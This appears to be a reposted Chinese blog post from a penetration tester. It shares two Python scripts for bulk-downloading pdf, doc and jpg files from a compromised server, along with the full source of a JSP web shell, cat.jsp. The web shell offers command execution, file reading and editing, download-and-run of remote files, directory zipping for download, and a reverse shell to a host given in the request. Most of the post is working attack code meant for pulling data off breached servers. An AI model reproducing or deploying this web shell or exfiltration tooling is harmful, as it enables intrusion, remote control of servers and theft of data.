滲透時有時會出現(xiàn)數(shù)據(jù)庫連接出錯，但本地有大量導(dǎo)出數(shù)據(jù)；或數(shù)據(jù)庫中存儲的圖片等文件保管在本地的情況，這時可能需要批量下載文件。但蟻劍、菜刀乃至冰蝎或一些web shell都缺少有效批量下載的功能，故利用cat.jsp提供的接口，寫了一個很垃圾的py腳本，可以達(dá)到穩(wěn)定下載文件的效果

list-tool.py(保存下載文件列表)

import osfrom bs4 import BeautifulSouplocal_html_path = "D:\\sploitInfo\\tpage\\" #保存cat.jsp讀取的靜態(tài)網(wǎng)頁的文件夾(因為對爬蟲還不太熟，故采取了讀取靜態(tài)網(wǎng)頁內(nèi)容的笨辦法。。) local_list_path = "D:\\sploitInfo\\tlist\\" #保存可下載文件列表的文件夾 local_dump_path = "D:\\sploitInfo\\tdump\\" #保存導(dǎo)出文件的文件夾def read_list(file):filelist = []id = "0"try:cat_page = open(local_html_path + file, "rb")soup = BeautifulSoup(cat_page, "html.parser")fullpath = str(soup.find("h1").text)len = fullpath.find("for")+4 #下載路徑的索引值id = fullpath[len:].replace("/", "-").replace(":", "@") ##匹配windows下保存文件格式tr_list = soup.find_all("tr")tr_list.remove(tr_list[0])for tr in tr_list:tt = tr.find("tt")if str(tt.text).find("pdf") != -1 or str(tt.text).find("doc") != -1 or str(tt.text).find("jpg") != -1 or str(tt.text).find("docx") != -1:filelist.append(str(tt.text))except:passprint(filelist)try:os.mkdir(local_dump_path+id+"")except:passdown_list(filelist, id)def down_list(filelist, id):listfile = open(local_list_path + id + ".txt", "w")for file in filelist:listfile.write(file + "\r")listfile.close()def get_htmllist_file():html_list = []for root, dir, file in os.walk(local_html_path):html_list.append(file)print(html_list)return html_listif __name__ == '__main__':# read_list("cat1.html")html_list = get_htmllist_file()for html_root in html_list:for html_file in html_root:read_list(html_file)

file-tool.py(下載文件)

import os from time import sleepimport requests import selenium from bs4 import BeautifulSouplocal_html_path = "D:\\sploitInfo\\page\\" local_list_path = "D:\\sploitInfo\\tlist\\" local_dump_path = "D:\\sploitInfo\\tdump\\" url = "http://**/cat.jsp?action=download&p="def read_list(filename):fileroot = []filelist = []fileinfo = []file = open(local_list_path + filename)fileroot.append(filename.replace(".txt", ""))try:for line in file.readlines():filelist.append(line.replace("\n", ""))except:passfileinfo.append(fileroot)fileinfo.append(filelist)return fileinfodef get_response(url):response = requests.get(url)return responsedef download_file(root, rooturl, filename):try:local_file_name = local_dump_path + root + "\\" + filenameif(os.path.exists(local_file_name)):print("\033[33m存在了" + "\033[30m", end=" ")return Falseresponse = get_response(rooturl + filename)file = open(local_file_name, "wb")file.write(response.content)file.close()print(filename + ": 下載成功", end=" ")return Trueexcept:print("\033[31m" + filename + ": 下載失敗", end=" ")print("\033[30m", end="")return Truedef get_cat_list():all_filelist = []for root, dir, file in os.walk(local_list_path):for ifile in file:all_filelist.append(read_list(ifile))return all_filelistif __name__ == '__main__':for ifilelist in all_fileinfo:fileroot = ifilelist[0][0]filelist = ifilelist[1]print("--------------------進(jìn)入" + fileroot + "目錄---------------------------------")count = len(filelist)now = 0for file in filelist:rooturl = url + fileroot.replace("@", ":").replace("-", "/") + "&fileName=" #替換回原路徑bool = download_file(fileroot, rooturl, file)now += 1print("(" + "%.2f"%(now/count*100) + "%" + ")")if bool:sleep(0.5) #防反爬蟲

以及cat.jsp（其實可以自己寫一個下載文件的接口就好，懶。。）

<%@page import="java.util.zip.ZipEntry"%> <%@page import="java.util.zip.ZipOutputStream"%> <%@ page language="java" pageEncoding="UTF-8"%> <%@page import="java.util.*"%> <%@page import="java.text.SimpleDateFormat"%> <%@ page import="java.io.*" %> <%@ page import="java.net.*" %> <%!static String encoding = "UTF-8";static{encoding = isNotEmpty(getSystemEncoding())?getSystemEncoding():encoding;}/*** 異常轉(zhuǎn)換成字符串，獲取詳細(xì)異常信息* @param e* @return*/static String exceptionToString(Exception e) {StringWriter sw = new StringWriter();e.printStackTrace(new PrintWriter(sw, true));return sw.toString();}/*** 獲取系統(tǒng)文件編碼* @return*/static String getSystemEncoding(){return System.getProperty("sun.jnu.encoding");}/*** 非空判斷** @param obj* @return*/static boolean isNotEmpty(Object obj) {if (obj == null) {return false;}return !"".equals(String.valueOf(obj).trim());}/*** 輸入流轉(zhuǎn)二進(jìn)制數(shù)組輸出流* @param in* @return* @throws IOException*/static ByteArrayOutputStream inutStreamToOutputStream(InputStream in) throws IOException{ByteArrayOutputStream baos = new ByteArrayOutputStream();byte[] b = new byte[1024];int a = 0;while((a = in.read(b))!=-1){baos.write(b,0,a);}return baos;}/*** 復(fù)制流到文件，如果文件存在默認(rèn)會覆蓋* @param in* @param path* @throws IOException*/static void copyInputStreamToFile(InputStream in,String path) throws IOException{FileOutputStream fos = new FileOutputStream(path);fos.write(inutStreamToOutputStream(in).toByteArray());fos.flush();fos.close();}/*** 模仿Linux下的cat Windows下的type 查看文件內(nèi)容 * @param path* @return* @throws IOException*/static String cat(String path) throws IOException {return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());}/*** 執(zhí)行操作系統(tǒng)命令 如果是windows某些命令執(zhí)行不了，可以用 cmd /c dir 執(zhí)行dir命令* @param cmd* @return*/static String exec(String cmd) {try {return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);} catch (IOException e) {return exceptionToString(e);}}/*** 下載文件到指定目錄,保存的文件名必須指定* @param url* @param path* @throws MalformedURLException* @throws IOException*/static void download(String url,String path) throws MalformedURLException, IOException{copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);}/*** 連接遠(yuǎn)程端口，提供本地命令執(zhí)行入口* @param host* @param port* @throws UnknownHostException* @throws IOException*/static void shell(String host,int port) throws UnknownHostException, IOException{Socket s = new Socket(host,port);OutputStream out = s.getOutputStream();InputStream in = s.getInputStream();out.write(("User:\t"+exec("whoami")).getBytes());int a = 0;byte[] b = new byte[1024];while((a=in.read(b))!=-1){out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8"));}}/*** 下載遠(yuǎn)程文件并執(zhí)行，命令執(zhí)行完成后會刪除下載的文件* @param url* @param fileName* @param cmd* @return* @throws MalformedURLException* @throws IOException*/static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{download(url, fileName);String out = exec(cmd);new File(fileName).delete();return out;}static void saveFile(String file,String data) throws IOException{copyInputStreamToFile(new ByteArrayInputStream(data.getBytes()), file);}/*** 文件壓縮* @throws IOException*/static void zipFile(ZipOutputStream zos,File file) throws IOException{if(file.isDirectory() && file.canRead()){File[] files = file.listFiles();for(File f:files){zipFile(zos, f);}}else{ZipEntry z = new ZipEntry(file.getName());zos.putNextEntry(z);zos.write(inutStreamToOutputStream(new FileInputStream(file)).toByteArray());zos.closeEntry();}}static void zip(ByteArrayOutputStream out,File file) throws IOException{ZipOutputStream zos = new ZipOutputStream(out);zipFile(zos,file);}%> <html> <head> <title><%=application.getServerInfo() %></title> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <STYLE>H1 {color: white;background-color: #525D76;font-size: 22px;}H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;}BODY {font-family: Tahoma, Arial, sans-serif;font-size:12px;color: black;background-color: white;}A {color: black;}HR {color: #525D76;} </STYLE> <script> function get(p){document.getElementById('p').value = p;document.getElementById('action').value = "get";document.getElementById('fm').submit(); } function saveFile(){document.getElementById('action').value = "saveFile";document.getElementById('fm').submit(); } </script> </head> <body> <%try{String action = request.getParameter("action");String path = isNotEmpty(request.getParameter("p"))?request.getParameter("p"):new File((isNotEmpty(application.getRealPath("/"))?application.getRealPath("/"):".")).getCanonicalPath();out.println("<form action=\"\" method=\"post\" id=\"fm\">");if(isNotEmpty(action) && !"get".equalsIgnoreCase(action)){if("shell".equalsIgnoreCase(action)){shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));}else if("downloadL".equalsIgnoreCase(action)){download(request.getParameter("url"), request.getParameter("path"));out.println("文件下載成功.");}else if("exec".equalsIgnoreCase(action)){out.println("<h1>命令執(zhí)行:</h1>");out.println("<pre>"+exec(request.getParameter("cmd"))+"</pre>");}else if("cat".equalsIgnoreCase(action)){out.println("<h1>文件查看:</h1>");out.println("<pre>"+cat(request.getParameter("path"))+"</pre>");}else if("auto".equalsIgnoreCase(action)){out.println("<h1>Auto:</h1>");out.println("<pre>"+auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd"))+"</pre>");}else if("download".equalsIgnoreCase(action)){response.setContentType("application/x-download");File file = new File(path,request.getParameter("fileName"));String fileName = file.isDirectory() ? file.getName()+".zip":file.getName();response.setHeader("Content-Disposition", "attachment; filename="+fileName);BufferedOutputStream bos = new BufferedOutputStream(response.getOutputStream());if(file.isDirectory()){ByteArrayOutputStream baos = new ByteArrayOutputStream();zip(baos, file);bos.write(baos.toByteArray());baos.close();}else{InputStream in = new FileInputStream(file);int len;byte[] buf = new byte[1024];while ((len = in.read(buf)) > 0) {bos.write(buf, 0, len);}in.close();}bos.close();out.clear();out = pageContext.pushBody();return ;}else if("saveFile".equalsIgnoreCase(action)){String file = request.getParameter("file");String data = request.getParameter("data");if(isNotEmpty(file) && isNotEmpty(data)){saveFile(new String(file.getBytes("ISO-8859-1"),"utf-8"),new String(data.getBytes("ISO-8859-1"),"utf-8"));out.println("<script>history.back(-1);alert('ok');</script>");}}}else{File file = new File(path);if(file.isDirectory()){ %> <h1>Directory Listing For <%=path%></h1> <HR size="1" noshade="noshade"> <table width="100%" cellspacing="0" cellpadding="5" align="center"> <tr> <td align="left"><font size="+1"><strong>文件名</strong></font></td> <td align="center"><font size="+1"><strong>文件大小</strong></font></td> <td align="center"><font size="+1"><strong>文件下載</strong></font></td> <td align="right"><font size="+1"><strong>最后修改時間</strong></font></td> </tr> <% List<File> ls = new ArrayList<File>();ls.add(new File(file,".."));ls.addAll(Arrays.asList(file.listFiles()));for(int i = 0; i < ls.size(); i++){File f = ls.get(i);String fileCanonicalPath = f.getCanonicalPath().replaceAll("\\\\","/");out.println("<tr "+((i%2!=0)?"bgcolor=\"#eeeeee\"":"")+"><td align=\"left\">&nbsp;&nbsp;<a href=\"javascript:get('"+(f.getCanonicalPath().replaceAll("\\\\","/"))+"');\"><tt>"+f.getName()+"</tt></a></td><td align=\"center\"><tt>"+(f.length()/1000)+"KB</tt></td><td align=\"center\"><a href=\""+request.getContextPath()+request.getServletPath()+"?action=download&p="+path+"&fileName="+f.getName()+"\"><tt>下載</tt></a></td><td align=\"right\"><tt>"+new SimpleDateFormat("yyyy-MM-dd hh:mm:ss").format(new Date(f.lastModified())) +"</tt></td></tr>");}}else{out.println("<h1>文件編輯:</h1>");out.println("File:<input type=\"text\" style=\"width:600px;\" name=\"file\" value=\""+path+"\" /><input type=\"button\" style=\"margin-left:20px;\" value=\"保存\" onclick=\"saveFile()\" /><span id=\"result\"></span><br/><br/>");out.println("<textarea style=\"width:100%;height:500px;\" name=\"data\">"+cat(path)+"</textarea>");}}out.println("<input type=\"hidden\" name=\"p\" id=\"p\" value=\""+path+"\"/><input type=\"hidden\" name=\"action\" id=\"action\" value=\"get\" /></form></table>");out.println("<HR size=\"1\" noshade=\"noshade\"><h3>"+application.getServerInfo()+"</h3></body></html>");}catch(Exception e){out.println("<pre>"+exceptionToString(e)+"</pre>");} %>

over

總結(jié)

以上是生活随笔為你收集整理的配合cat.jsp批量下载脚本的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。